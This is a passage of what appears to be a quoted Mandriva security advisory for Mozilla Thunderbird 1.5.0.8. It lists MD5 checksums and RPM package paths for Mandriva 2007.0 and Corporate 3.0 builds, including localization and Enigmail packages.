>2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1c92d5ee79fc52ec1525f3c96dfa1916  
>2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  42e6ddb4a33a297c71b996bf651a4d69  
>2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  96394d1245284a886b954bb063c0ab5b  
>2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  8386317130e064260bd8b114616410ed  
>2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  eb622e8adc0767e090a608e80a1611b7  
>2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3ca6736aaf725851a0be21f0490aeb20  
>2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  47b16b8c45acc936b62051594ed87c69  
>2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c2e742162882c52761040025ff4ddfff  
>2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  072c5224bd49a45ba7ab0a57f657ec6e  
>2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3393e810730d305adc4fe8ecc98b782a  
>2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  70882501b0fc01a56cee67c2b7c63ac5  
>2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Mandriva Linux 2007.0/X86_64:
>  47aa8c7af46ee44f1b51e0f44772beeb  
>2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e284b46733e04ab96cccb612de04e5a8  
>2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e73efd093c48aa82d6f73025f1ade443  
>2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ed790bdd1a45343b427925765f5f2b5c  
>2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  61690a97ef04b6083693ffe4a9ab3176  
>2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  889574eda89385739aad6eda7f3d2604  
>2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ef9b59cdd619da74737b5e91e4067386  
>2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e20a88ece32f8ee81aaedd828558d880  
>2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  250f6f86984922da278774d480ba37a7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f683dba38c9055cbac36f8468e357ebf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6594d0bb3f7770f168728827c1cf9f83  
>2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1ee011c3c94c7b081f53b9a55996da0c  
>2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be24dd32e628b8294c1b87d200cf02dd  
>2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  020acf8e510080a701c6278c6eb862ae  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  af4c92e4f3eaf833111572ead14c8c04  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7483c3a55198fcbc9be2c9750919a370  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  753acdb58e6400659dab48ff78f371e7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  fb83f542bd12edda5e85d9873a08a938  
>2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  996bbfb13654cfc2180036ea6b1e61df  
>2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ff6217b99ab96a1444b6a758bf184ecf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f15d9f053011068deba71fdc05dc6d46  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  98f63b0dedef781ec16f8bebb6a032cb  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e5e42bb849d26a4f59fb6204d6ed9850  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8bc9d56d4778baf40b115eb805a506b3  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  21c7d7ffd14a724e4ce9d96e99d0f3c7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9b115831c8ae36d7141c93a9d867d445  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  d6efb3cdaba13c17dd31147011796614  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4239765036a0bffaa4fcff9fb076a221  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be87cc456600cb0dc18730ae3f75af92  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  459367e42865a1de4374d2a9b8c36232  
>2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e1b30720806b2c6ab650251f9756127  
>2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  70c5525bea63d291374706abfb4523c4  
>2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4addf81f6fdb0fe55d2274ba726d066e  
>2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9c9a1e6a7623a712f40666e77fd3f2b4  
>2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9cd9d0509bbe4d0bc7c092118253c237  
>2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  b23236fc11caa38b1354893f1e9863e1  
>2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c5b898d7f04c26a34bb4223ee4547586  
>2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8e114fec014131d472790035a1509783  
>2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  3eda3b36a83c550a1f52faf6adfb0b10  
>2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c336cc525567465d1649ee55c604d3a3  
>2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  476f974ea2e3b9ef971231b8b08e62f0  
>2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7878332de8134b9025b924315d6ffbf6  
>2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7602f9099c26d60e934f54918dd38e46  
>2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  52ba4b91175db4376fd4c4e9018969c3  
>2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e2bc31ee83c5c47f06953aba976a27d  
>2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  47b180beb65802e89f7e6a8be7f33d15  
>2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6485a71b5d07fef3e337630aa53bb4c6  
>2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6b5df9cad533fc75fc47191df5f3dabf  
>2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99b61d660a72eff639f78ec0422aeaf2  
>2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99cfe247978fe85b5b5186bf12247f3a  
>2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8c393629997cea717c2f1e8d077a9344  
>2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be518e4b4833e6cb9d083871101be35b  
>2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8dedff0ffd0e7b7721b256f01821f188  
>2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  05202d61506a60981fb9a317ce6a5d5d  
>2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0deda88ec857fb0c11b57555814a20ec  
>2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0f2f7928b2edfbe0ae5faf127b0ed066  
>2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Corporate 3.0:
>  71192ef0a8bd28533718191d287d8158  
>corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
>  c0121a4a0192d7944b1f8d30c977ab38  
>corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
>  53c403f48cb8547f0eb646ab1b41b656  
>corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  032ebcc12942292620b05929e0583f3a  
>corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  c88d6e26aa75dab433abcf71f2962e5c  
>corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
>  dcc54cb45829470f4267806696b46eca  
>corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  e7ba899422d7cbfd343659b810e4ee52  
>corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
>  d987b44bd201c2a23b404751e13df538  
>corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  9d496fa524a5226676f56ed87d2015ec  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
>  eac64993c47963ede70eca5fb62e30b9  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  b5523fcbf2370d1805e1f917faaa31c8  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  1eb806fe5a429b52f010e16aeed4cb4a  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8da00f3e4033ec813df4548072ac9f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a2434c868a3b5799cb69c31d43f900c  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  a1bb48121d53f83bf0efd303ea477b71  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  6f9d308c194ae42cfa0787afdebff2cc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  bb3c3cf4056814131f8031471c81ac6f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  4228aaf098c501a80af97469393482b5  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a95ad54416e2f002d1aaa32557cf947  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  19e1eac0351d89760ee31b4c9ee4fcc4  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1c21de0415bd0223237aa82795cc9600  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  a11487e4145c294a57a77491f6996748  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  31064002ac59d4857c3c45c3161580dc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  fc88eeba422b084ffa67b77211248ef0  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
>  4ead83e3405e7469370b4f02a9254ddc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a15b707a6d7f8e9b25c1ccaea023333  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8c565fd3b42069b2e42103d98dfab2  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  0040d479d7e55304c06df39b2233d12e  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  6fab1321b377748e22a6709b772d5159  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  1969ec5d6cc27df2f09f9733b5b37c6d  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  0c34a8e8bd3f9011283fe990771a857a  
>corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  68781ca20e2232457046bdab86b59462  
>corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  37c3909b8feb9a35208519ccf4ec8a46  
>corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea2febd0e93d9348fd580452f7adc0be  
>corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  2eac2aaeb4fe209f98aa85505f6a9b87  
>corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  d8d8fc30075f0848859cbe96b26404a7  
>corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
>  3af19a8b01fb316451132e6460c7deb0  
>corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7aed893e50dff94f47d658d70093824  
>corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
>  ab6ead860edf6de4935aa3bb4ecf4721  
>corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  a9b0bc2b2bcf186b5a284cba3d6cad19  
>corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  373554b2032c20a61c48f4a4e11e5b57  
>corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a2efc51627d9f55929e1b33e20f5274  
>corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
>  27ab1d70b317c477b56df8223a8477b4  
>corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
>  0bcd50b34bec84016747f4919b43b8e1  
>corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
>  4b26e1653ccf78604c16b25ed7357dfb  
>corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea1a0d0349f9a2f26b23c7678d7e5736  
>corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  7d7c13e7a820c069b3c657adf57443d9  
>corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  ef0755e523de702c802890f494ee5ea0  
>corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7618d53bff6c0764297f2352c5d0239  
>corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  8df8db645153b5f7539044d5f892ad54  
>corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  d26cb2fbb5301bcf127ea4e4606f52b9  
>corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  f57d3dd11471a798542b87f0a3c68e82  
>corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f3aede5440aeb78b59350fe56bb221d2  
>corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  bda7588d80565c17190fb407bdc3b1b2  
>corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
>  5f0764d5685d0836bd718fdc86b8a73a  
>corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  2a1892c7e027dba761df43c98bb5e85f  
>corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>
>  Corporate 3.0/X86_64:
>  c109965ada094232d0958a8121be977a  
>corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e50d4054e85e4624b285067c75cfab18  
>corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f8cc5e4a36961ef4db2b8632fc6734d9  
>corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  70e0a1878ce810ee835e7eca08a11e12  
>corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  50abb11664ca02e6d77cbf30396e5398  
>corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5565876286c51872fb0ff90df059f052  
>corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cdd3892a5ba2a7c1ffe29d009e9d23a9  
>corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ba3e7a92e79e00cd74b722ab94d832eb  
>corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c11927081645df376c72f27e8ebc6a85  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  448172b7c753b48c81b2a2c5d337b9e5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b83c0eb2158672f087fd5754ca27efad  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  49b91f3eae7a0773ecce62f635a6dfe9  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3a0cf5325721e29c4eba9ee7cbc7efb7  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cadf1aff1e915adb9e14539eb04521db  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8218118b837bf05b3603652f0d4c5690  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7c7190fc9ec1fc5774436ec7b0c92fd5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a42f63c64470ba933d6239bdf8b1569c  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  af8c5d7e3569278f3e9d364362be25b3  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c749a5b7ac03ad98919f83425fcbd4c2  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ac82cd1f4fc0c5ed57be5b165cc65be4  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0fbd67977bdfc1b1f9aa3c846c80c244  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4d26f0c7b32d3888e1e5c4c14516a4df  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  37fbc8358f1f11d5cb9f0e9b2fab3b26  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6bec775a601e84be547246ae5638d059  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0dc1c40ef6d1a233661048447db25543  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7ec948cc8df84aae6b3d660bd4187208  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4b7ba48ffeff51709b26c8f315a4aaa1  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  94fceae9b7bc6d48fe2677eecaaf11a6  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d578499c38c981f2b8cc55fc1351efef  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  095291274be4a418d05c4e96cb441d90  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  272b554e86966e103d3e7f42b5cba9db  
>corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  52bd52c4d5eaad6fa541dd20db5411d0  
>corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  2536b28aa209a912ff74601db4e685b4  
>corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  484ad35799b9a8cd277754bf1b13d686  
>corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  42ff5a3a8320c4be3ffb1f1d74912f78  
>corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8a46a1d9f9380c205699ce090d749ff2  
>corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3c30c5aeee783bfabe34fb1ff7357d38  
>corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a90b14f77d6eed2228bfa55457803f6f  
>corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  719239492f7d93b04f2c95902fccf94c  
>corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f52bcdf19f10745e756f0d58616126df  
>corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  79826e403152cbe90ddf3bd4d8d64abe  
>corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  18c08993c8f43c976be6cf2e8cfb2c35  
>corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b17866029fe4244a77af59fbb55a07b9  
>corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  878f59fdb3ebb5929fc23437a17fb5ad  
>corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d62fb25dc173e8b12be8623ae8fbf9bf  
>corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  266322718c7cedd78e89524940f15d55  
>corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  32c5fcab859aff66aaf704b997a1c625  
>corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  17d7eeb0fbd25df1f76d5fa875ef7a3d  
>corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4aabd47a35cb15547ccbe4eda1b521e8  
>corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  1d8d27be2902605b0eae9dcbd89654cc  
>corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6c116048a69b3c176831fde5ff0a252a  
>corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e5bcb8518c5a61e63e62f90c363c67ae  
>corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5569afdd940d28bdf37a1003d5d5d6b0  
>corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d00245da432be7a7d268846891555930  
>corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ee130a70f9b1fe5719fea63963f3db6d  
>corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  81f41bebeb9eca34d7c27ab81ca41af6  
